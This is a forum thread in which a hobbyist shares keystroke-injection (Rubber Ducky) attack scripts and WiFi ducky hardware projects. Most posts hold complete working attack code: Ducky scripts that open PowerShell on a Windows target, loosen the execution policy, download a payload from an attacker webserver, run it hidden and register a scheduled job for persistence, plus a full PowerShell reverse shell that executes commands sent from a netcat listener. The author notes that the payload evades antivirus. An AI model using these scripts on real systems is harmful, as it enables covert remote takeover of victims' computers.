basic4

Wifi Rubber Ducky with file download capability maybe?

Using a Scheduled Job to make the Reverse Powershell Survive Reboot I've added a couple of lines to the powershell ducky script that schedules the reverse shell script to re-start after boot-up and logon by the user. This now gives us connection resilience and some degree of permanence, allowing the shell to reconnect to the server around 50 secs after a logon by our hijacked user. REM Opens a reverse shell to back to netcat on 192.168.0.29:6673 REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script) REM MAP UK - for WifiDucky only. DELAY 2000 GUI DELAY 2500 STRING powershell.exe DELAY 800 MENU DELAY 500 STRING a ENTER DELAY 1200 ALT + Y DELAY 250 ENTER DELAY 3000 REM first lets set the execution policy if possible STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser DELAY 50 ENTER DELAY 750 STRING Y DELAY 250 ENTER DELAY 200 STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents"; DELAY 70 ENTER DELAY 50 STRING $fullpath = $dirx + "\PS_TCP4.ps1"; DELAY 70 ENTER DELAY 50 STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath; DELAY 50 ENTER REM delay here to ensure download is complete DELAY 3500 REM finally - attempt to make the shell survive a reboot STRING $jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50 DELAY 50 ENTER DELAY 400 STRING Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} -Name "NetCheckRun" DELAY 50 ENTER DELAY 1200 STRING cd $dirx; ENTER DELAY 200 STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} DELAY 100 ENTER DELAY 200 STRING exit ENTER Using the command concat style outlined in illwill's script (see post above) it should be possible to 'self-write' the reverse shell script within the ducky script and circumvent the need to download the script.

Hi Zibri - Yes. You'd need to install the serial drivers via a script (powershell etc) to get full 2-way communication.

illwill - Nice that download isn't required on your script. I think I'll make a hybrid to get a non-download one, but still retain error control and connection recovery. I've also found a way to survive target reboot. Tested it yesterday and it works on Win7. Still need to confirm it will work on Win10. I'll post it up later today.

WATSEE: As for the keyboard layout issue (US/UK) - I think the easiest way would be to alter the bash script to pickup a locale identifier (eg. 'MAP UK' or 'MAP US') and translate the 6-8 character differences between the two keyboard types. I had to do the same with other Arduino 'Ducky' projects I worked on. If I get time in the next few days, I'll do that and post it back here. Edit: Looks like you'd maybe better trying something like 'setxkbmap gb' as you'd need to change both the duckpi.sh and the C file. (I wonder why the originators wrote it that way - seems a bit limited.)

Better to parameterise the destination address and port of the attacker machine in the powershell script. Makes things easier to change dynamically - if required. Example : ./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673 param([String]$dest, [Int32]$port ); while (1 -eq 1) { $ErrorActionPreference = 'Continue'; try { #attempt inital connection $client = New-Object System.Net.Sockets.TCPClient($dest,$port); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { #attempt to execute the received command $sendback = (iex $recdata 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; } catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls; } $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } catch { #an initial connection error - close and wait 30 secs then retry if($client.Connected) { $client.Close(); } cls; Start-Sleep -s 30; } } Obviously we'd also have to change the appropriate call in the powershell ducky script... STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} Also, on some Win10 machines, executing powershell scripts is disabled by default. But I seem to be able to get around that with a few extra lines in the ducky script which set execution policy for the current user. So Our new ducky script would be.. REM Opens a reverse shell to back to netcat on 192.168.0.29:6673 REM Downloads payload from a webserver on 192.168.0.29:80 (see PS_TCP4.ps1 script) DELAY 2000 GUI DELAY 2000 STRING powershell.exe ENTER DELAY 3000 REM first lets set the execution policy if possible STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser DELAY 50 ENTER DELAY 750 STRING Y DELAY 250 ENTER DELAY 200 STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents"; DELAY 70 ENTER DELAY 50 STRING $fullpath = $dirx + "\PS_TCP4.ps1"; DELAY 70 ENTER DELAY 50 STRING Invoke-WebRequest -Uri "http://192.168.0.29/PS_TCP4.ps1" -OutFile $fullpath; DELAY 50 ENTER REM delay here to ensure download is complete DELAY 3500 STRING cd $dirx; ENTER DELAY 100 STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1 -dest 192.168.0.29 -port 6673} DELAY 100 ENTER

Hi - Are you in the UK? - If so, you need to change the key mapping when encoding your script. See international keyboards in the ducky docs. Regards, basic4.

I've used the powershell script above (PSD_TCP4.ps1) in a ducky script and it works perfectly on Win7 & 10! Setup Set up my 'evil server' on a Raspberry Pi3 (webserver on port 80 and netcat listening on port 6673) The ducky script then runs on a windows 7/10 target: 1. Opens powershell on the target. 2. Downloads the reverse shell payload script. 3. Executes it thus forming a link back to netcat running on the Raspberry Pi3. Ducky script: REM Opens a reverse shell to back to netcat on 192.168.0.17:6673 REM Downloads payload from a webserver on 192.168.0.17:80 (see PS_TCP4.ps1 script) DELAY 2000 GUI DELAY 800 STRING powershell.exe ENTER DELAY 2000 STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents"; DELAY 70 ENTER DELAY 50 STRING $fullpath = $dirx + "\PS_TCP4.ps1"; DELAY 70 ENTER DELAY 50 STRING Invoke-WebRequest -Uri "http://192.168.0.17/PS_TCP4.ps1" -OutFile $fullpath; DELAY 50 ENTER REM delay here to ensure download is complete DELAY 3500 STRING cd $dirx; ENTER DELAY 100 STRING powershell.exe -windowstyle hidden {./PS_TCP4.ps1} DELAY 100 ENTER Conclusions This seems to work very well and doesn't get Kaspersky's attention at all. I'm sure that the ducky script could be improved greatly. But I'm happy the proof-of-concept is sound.

Hi - A ducky only works if the user IS logged in AND the screen isn't locked. Using a ducky requires that the user has walked away from the target machine without locking it. Or if you can distract the user from the screen for the amount of time needed to insert the ducky and run its script. When a machine is locked, can you use the keyboard? (except to login) - No you need the password - which we don't know. So a Ducky is just a tool to type commands very quickly - that's all. Regards, Basic4.

Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky) Just setup a netcat listener on the attacker machine with: nc -l 6673 I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too. The Powershell Script itself (could still use some tidying up - but works perfectly as is :) while (1 -eq 1) { $ErrorActionPreference = 'Continue'; try { #attempt inital connection $client = New-Object System.Net.Sockets.TCPClient("192.168.0.17",6673); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { #attempt to execute the received command $sendback = (iex $recdata 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; } catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls; } $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } catch { #an initial connection error - close and wait 30 secs then retry if($client.Connected) { $client.Close(); } cls; Start-Sleep -s 30; } } This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more. Regards, Basic4. PS_TCP4.ps1

See the following projects I've built around the Ducky HID attack.. https://github.com/basic4/WiDucky - Wifi Ducky with windows/Python/Android controllers. https://github.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle - A basic ducky with microSD for under $10. Basic4.

Hi 1. No ducky will work when a machine is locked. That's one of their limitations. 2. Yes - the WiDucky can just sit there and do nothing until you connect to it over WiFi - and send keystrokes. Basic4.

It's all here https://github.com/basic4/WiDuck

Details available on https://github.com/basic4/WiDucky

It's a good solution. Although I built a wifi ducky based on arduino boards and the ESP8266, since combining both gave the possibility of full speed USB and multiple end points. I built prototypes and used these until I found the 'Cactus Micro' , which is a combination of a Leonardo and ESP8266. Wrote various controllers for Python, .NET and Android. Works well. Since the Atmel chip is recognized as both a HID device and a Serial port, You can (via a script) run command prompt in a windows target, and return the output of the script (via serial) to the duck and then on back to the attacker machine! Can supply the code if you're interested.

Did this around a year back. Works just like a ducky only via wifi. I wrote a control app and script parser in C#, one in android (very useful) and another in Python. Since the 'controller' sends the keystrokes, interactive scripts are possible. Built 3 prototypes (differing hardware) but the smallest is the best.